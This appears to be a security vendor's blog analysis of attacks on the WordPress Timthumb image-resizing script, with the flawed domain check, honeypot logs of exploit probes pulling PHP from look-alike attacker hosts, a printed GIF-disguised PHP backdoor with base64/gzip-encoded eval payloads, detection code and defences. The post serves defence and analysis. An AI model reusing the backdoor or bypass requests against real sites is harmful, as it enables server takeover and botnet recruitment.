SpiderLabs Research Team has been tracking an increase in WordPress Timthumb plug-in scanning. How widespread are the attacks? We just added the following entry to the Web Hacking Incident Database (WHID):
WHID 2011-262: Hackers 'Timthumb' Their Noses At Vulnerability To Compromise 1.2 Million Sites
WordPress Timthumb Vulnerabilities
WordPress plug-ins have had a long history of security issues, and the latest one being targeted by attackers is Timthumb, an image resizing utility. OSVDB lists 19 different vulnerabilities in the timthumb.php script.
Timthumb Vulnerability
The Timthumb vulnerability lies in a client's ability to load content from a remote website using the "src=" parameter and to have the web server write that remote content to a web-accessible directory, which the client can then request and execute.
Timthumb's default configuration allows clients to load images from a predefined set of remote websites for resizing and serving:
// external domains that are allowed to be displayed on your website
$allowedSites = array (
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
    'photobucket.com',
);
Weak Domain Validation
Timthumb's validation of these domains was too weak:
// check allowed sites (if required)
if (ALLOW_EXTERNAL) {
    $isAllowedSite = true;
} else {
    $isAllowedSite = false;
    foreach ($allowedSites as $site) {
        if (strpos (strtolower ($url_info['host'] . '/'), $site) !== false) {
            $isAllowedSite = true;
        }
    }
}
This section of code only checked that an allowed domain name appeared somewhere in the host string (a strpos substring test); it did not anchor the match to the end of the hostname. This allowed attackers to register hostnames that begin with an allowed domain (the allowed name becomes a sub-domain label of the attacker's own domain) and pass the check. For example, here is a listing of bogus domains used in attacks we are seeing:
The Timthumb code has since been updated with stronger validation checks to ensure that such sub-domain tricks no longer pass. Here is a code diff of the updated validation checks:
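To make the weakness concrete, here is an added example (not Timthumb's own code) that mirrors the strpos-based check in Python beside an anchored check; ALLOWED_SITES is the default list quoted above, the attacker hosts are taken from the honeypot log excerpt in this post, and the img.youtube.com URL is constructed.

```python
from urllib.parse import urlparse

# Timthumb's default allow-list, as quoted in the post.
ALLOWED_SITES = [
    "flickr.com", "picasa.com", "blogger.com", "wordpress.com",
    "img.youtube.com", "upload.wikimedia.org", "photobucket.com",
]


def weak_is_allowed(url: str) -> bool:
    """Mirror of the vulnerable PHP: strpos(strtolower($host . '/'), $site) !== false.

    It only asks whether an allowed name occurs *somewhere* in the host string, so an
    attacker-registered host that merely begins with (or contains) "blogger.com" passes.
    """
    host = (urlparse(url).hostname or "").lower() + "/"
    return any(site in host for site in ALLOWED_SITES)


def strict_is_allowed(url: str) -> bool:
    """Anchored check (one hardened form written for this example, not the project's patch).

    The host must be exactly an allowed name, or end with "." + allowed name, so the
    match is pinned to the right-hand end of the hostname on a label boundary.
    Drop the endswith() clause if sub-domains of allowed sites should also be refused.
    """
    host = (urlparse(url).hostname or "").lower().rstrip(".")  # tolerate a trailing-dot FQDN
    if not host:  # relative paths and schemeless strings never count as an allowed remote site
        return False
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


if __name__ == "__main__":
    for url in ("http://blogger.com.freeclicktrack.com/bery.php",   # from the log excerpt
                "http://picasa.com.xpl.be/yahoo.php",               # from the log excerpt
                "http://img.youtube.com/vi/example/0.jpg"):         # constructed benign URL
        print(f"{url:48} weak={weak_is_allowed(url)!s:5} strict={strict_is_allowed(url)}")
```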
Timthumb Scanning
SpiderLabs Research Team has monitored large amounts of scanning for various Timthumb theme locations for WordPress. Here are some recent example probes taken from Apache honeypot logs:
72.167.247.190 - - [15/Nov/2011:17:03:49 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/index.php HTTP/1.1" 404 250
72.167.247.190 - - [15/Nov/2011:17:03:50 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/sh.php HTTP/1.1" 404 250
72.167.247.190 - - [15/Nov/2011:17:03:50 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/index.php HTTP/1.1" 404 250
74.208.243.114 - - [15/Nov/2011:18:51:43 +0900] "GET /error_log//wp-content/themes/echoes/timthumb.php?src=http://picasa.com.sienbity.com/sample.php HTTP/1.1" 404 254
74.208.243.114 - - [15/Nov/2011:18:51:44 +0900] "GET //wp-content/themes/echoes/timthumb.php?src=http://picasa.com.sienbity.com/sample.php HTTP/1.1" 404 244
212.20.215.11 - - [15/Nov/2011:18:52:06 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 243
212.20.215.11 - - [15/Nov/2011:18:53:58 +0900] "GET /error_log/wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 253
212.20.215.11 - - [15/Nov/2011:18:53:59 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 243
87.229.7.214 - - [15/Nov/2011:21:01:00 +0900] "GET /error_log//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 260
87.229.7.214 - - [15/Nov/2011:21:01:01 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 250
87.229.7.214 - - [15/Nov/2011:21:01:06 +0900] "GET /error_log//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 260
87.229.7.214 - - [15/Nov/2011:21:01:08 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 250
87.229.7.214 - - [15/Nov/2011:21:14:24 +0900] "GET //wp-content%2Fthemes%2Ftwentyeleven%2F','',%20'00d7440ee862e3d6328819b426082b518d63b83bff2382eac8c5',%200)//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 442
87.229.7.214 - - [15/Nov/2011:21:14:26 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 250
87.229.7.214 - - [15/Nov/2011:22:28:37 +0900] "GET /error_log/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 264
87.229.7.214 - - [15/Nov/2011:22:28:39 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 254
87.229.7.214 - - [15/Nov/2011:22:30:14 +0900] "GET /wp-content%2Fthemes%2Fpbv_multi%2Fscripts%2F%22','',%20'00cde21c9ec2dd04d5110475ca5c39de0aef39f89b392513618e',%200)/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 462
87.229.7.214 - - [15/Nov/2011:22:30:15 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 254
87.229.7.214 - - [15/Nov/2011:22:31:08 +0900] "GET /error_log/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 264
87.229.7.214 - - [15/Nov/2011:22:31:09 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 254
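As an added example (not part of the original post), the following Python detector runs over access-log lines like those above and flags Timthumb requests whose src host merely contains an allowed name, or whose src fetches a .php resource; the allow-list is Timthumb's default, three sample lines are copied from the excerpt above, and the fourth is a constructed benign request.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Apache combined-log prefix: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
THUMB_PATH_RE = re.compile(r"/(tim)?thumb\.php$", re.I)  # timthumb.php and its thumb.php copies
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com",
                 "img.youtube.com", "upload.wikimedia.org", "photobucket.com"]

# First three lines come from the honeypot excerpt; the last is constructed and benign,
# so the detector has a request it must *not* flag.
LOG_LINES = [
    '212.20.215.11 - - [15/Nov/2011:18:52:06 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 243',
    '87.229.7.214 - - [15/Nov/2011:21:01:01 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 250',
    '74.208.243.114 - - [15/Nov/2011:18:51:44 +0900] "GET //wp-content/themes/echoes/timthumb.php?src=http://picasa.com.sienbity.com/sample.php HTTP/1.1" 404 244',
    '203.0.113.5 - - [15/Nov/2011:19:00:00 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://img.youtube.com/vi/example/0.jpg&w=100 HTTP/1.1" 200 4120',
]


def host_allowed(host: str) -> bool:
    """Anchored allow-list match: exactly an allowed name, or a sub-domain of one."""
    return any(host == s or host.endswith("." + s) for s in ALLOWED_SITES)


def classify(line: str):
    """None for lines that are not Timthumb requests; otherwise a finding (reasons may be empty)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not THUMB_PATH_RE.search(path):
        return None
    src = parse_qs(query).get("src", [""])[0]   # parse_qs already URL-decodes once; do not decode again
    parsed = urlparse(src)
    host = (parsed.hostname or "").lower()
    reasons = []
    if parsed.scheme and not host_allowed(host):
        # The bypass described in the post: an allowed name embedded in a longer attacker host.
        reasons.append("look-alike allowed host" if any(s in host for s in ALLOWED_SITES)
                       else "host not on allow-list")
    if parsed.path.lower().endswith(".php"):
        reasons.append("src fetches a .php resource")   # an image resizer never needs this
    return {"ip": m.group("ip"), "src_host": host, "status": int(m.group("status")), "reasons": reasons}


def scan(lines):
    """Findings with at least one reason, plus a per-source-IP count for triage."""
    findings = [f for f in map(classify, lines) if f and f["reasons"]]
    return findings, Counter(f["ip"] for f in findings)
```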
Over the past 3 days, we have identified the following statistics from our honeypots:
- 16838 Timthumb attack requests
- 158 unique source IP addresses sending attack requests
Injected Code Analysis
Here is an example of malware code that attackers attempt to upload through the timthumb script:
GIF89a????????!?????,???????D?;?<?php
@error_reporting(0); @set_time_limit(0);
$lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) {
    eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE=')));
    die;
} elseif (isset($osc)) {
    eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ==')));
} else {
    eval(gzinflate(base64_decode('...')));
}
?>
By analyzing this code, we can see some common techniques used by attackers.
Spoofing Image Mime-Types
By pre-padding their code with fake GIF image header data (the GIF89a bytes at the start of the sample above), they can trick the following mime-type checks in Timthumb:
/**
 * determine the file mime type
 *
 * @param $file
 * @return
 */
function mime_type ($file) {
    $file_infos = getimagesize ($file);
    // no mime type
    if (empty ($file_infos['mime'])) {
        display_error ('no mime type specified in image');
    }
    $mime_type = $file_infos['mime'];
    // use mime_type to determine mime type
    if (!preg_match ("/jpg|jpeg|gif|png/i", $mime_type)) {
        display_error ('Invalid src mime type: ' . $mime_type);
    }
    $mime_type = strtolower ($mime_type);
    $mime_type = str_replace ('image/', '', $mime_type);
    if ($mime_type == 'jpeg') {
        $mime_type = 'jpg';
    }
    return $mime_type;
}
Code Obfuscation
They obfuscate their actual code by combining multiple PHP functions. In this case, the payload has been compressed with gzip and then base64 encoded, so decoding must reverse those steps in the correct order: base64_decode first, then gzinflate. SpiderLabs Research has seen many samples using different combinations of base64 encoding, gzip compression and str_rot13.
After decoding the injected code, we can then analyze the payloads to see what the true intentions are of the attacker.
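An added example (not from the post and not the attacker's payload) that covers both points above: it flags a file that starts with an image header but carries a PHP open tag, and it peels gzinflate/base64_decode/str_rot13 wrappers in the order the call chain requires (innermost call first). The stub it decodes is constructed here from a harmless string; the layer order deliberately mixes all three functions.

```python
import base64
import codecs
import re
import zlib

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# eval(f1(f2(...('<base64 blob>')))) -- group 1 is the chain of function names, group 2 the blob.
EVAL_RE = re.compile(r"eval\(((?:\w+\()+)'([A-Za-z0-9+/=]+)'\)+")


def is_image_php_polyglot(data: bytes) -> bool:
    """getimagesize() only inspects the image header, so a real GIF89a header followed by
    PHP passes Timthumb's mime check; flag anything that looks like an image *and* PHP."""
    return data.startswith(IMAGE_MAGIC) and b"<?php" in data


def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() consumes raw DEFLATE (no zlib/gzip header): wbits = -15."""
    return zlib.decompress(data, -15)


def str_rot13(data: bytes) -> bytes:
    """PHP str_rot13(): rotate ASCII letters only; latin-1 keeps every other byte intact."""
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")


DECODERS = {"base64_decode": base64.b64decode, "gzinflate": gzinflate, "str_rot13": str_rot13}


def peel(php_source: str) -> list:
    """Decode every eval() wrapper found, applying the innermost function first."""
    results = []
    for chain, blob in EVAL_RE.findall(php_source):
        funcs = chain.rstrip("(").split("(")          # outermost ... innermost
        data = blob.encode("ascii")
        for fn in reversed(funcs):                    # innermost call runs first
            data = DECODERS[fn](data)
        results.append(data)
    return results


def build_sample(inner: bytes) -> bytes:
    """Constructed stub in the shape of the sample above: GIF header, then PHP whose payload
    was rot13'd, raw-deflated and base64'd, so decoding has to run those steps in reverse."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(str_rot13(inner)) + c.flush()).decode("ascii")
    php = "<?php eval(str_rot13(gzinflate(base64_decode('%s')))); ?>" % blob
    return b"GIF89a\x01\x00\x01\x00\x80\x00\x00;" + php.encode("ascii")
```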
Botnet Recruitment
What are the goals of these attacks? They vary; however, the vast majority of attacks retrieve PHP backdoor/trojan code that allows the attacker to take control of the web server. While a compromised host can serve many additional purposes, all of the backdoor code allows the web server to be used as part of a botnet and for conducting DoS attacks. Here are some of the trojan backdoor samples we have gathered.
Fx29SheLL
Backdoor Interface
Google Search Results (131,000 compromised hosts)
b374k m1n1
Backdoor Interface
Google Search Results (112,000 compromised hosts)
WordPress Timthumb Defense
If you are running WordPress applications, it is highly recommended that you follow these steps.
Beware of Outdated Themes
The Timthumb.php script comes included in a large number of WordPress Themes including:
- Supermassive
- eGallery
- TheStyle
- ElegantEstates
- Modest
- Envisioned
- Boldnews
- Fordreporter
- Twentyeleven
Even though the Timthumb.php code itself has been updated to mitigate these vulnerabilities, many of these third-party Themes still have older versions bundled with them. You should verify your Timthumb version to ensure you have the latest code.
Run the WPScan Tool
There is an open source WordPress vulnerability scanner called WPScan that can quickly check your settings and alert you to outdated plugins. The most recent version also includes a new runtime flag that specifically looks for Timthumb issues.
Install ModSecurity and the OWASP Core Rule Set
If ModSecurity is installed and using the OWASP Core Rule Set, it can detect both the initial infection attempts and any subsequent access to a backdoor/trojan web page.
SpiderLabs Commercial Rules - WordPress Timthumb Virtual Patches
The newly released commercial ModSecurity Rules from Trustwave SpiderLabs include virtual patches specifically for known WordPress Timthumb vulnerabilities:
- (2075636) ModSecurity Rules from Trustwave SpiderLabs: LISL Last-Image Slider Plugin for WordPress wp-content/plugins/lisl-last-image-slider/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution
- (2075637) ModSecurity Rules from Trustwave SpiderLabs: Rent-A-Car Plugin for WordPress wp-content/plugins/rent-a-car/libs/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution
- (2075638) ModSecurity Rules from Trustwave SpiderLabs: Auto Attachments Plugin for WordPress wp-content/plugins/auto-attachments/thumb.php src Parameter File Upload Arbitrary PHP Code Execution
- (2075672) ModSecurity Rules from Trustwave SpiderLabs: A. Gallery Plugin for WordPress wp-content/plugins/a-gallery/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution
- (2075781) ModSecurity Rules from Trustwave SpiderLabs: Simple Slide Show Plugin for WordPress wp-content/plugins/simple-slide-show/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution
- (2076737) ModSecurity Rules from Trustwave SpiderLabs: Popular Posts Plugin for WordPress wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution
If you are interested in purchasing the commercial rules feed subscription, head on over to the shopping cart.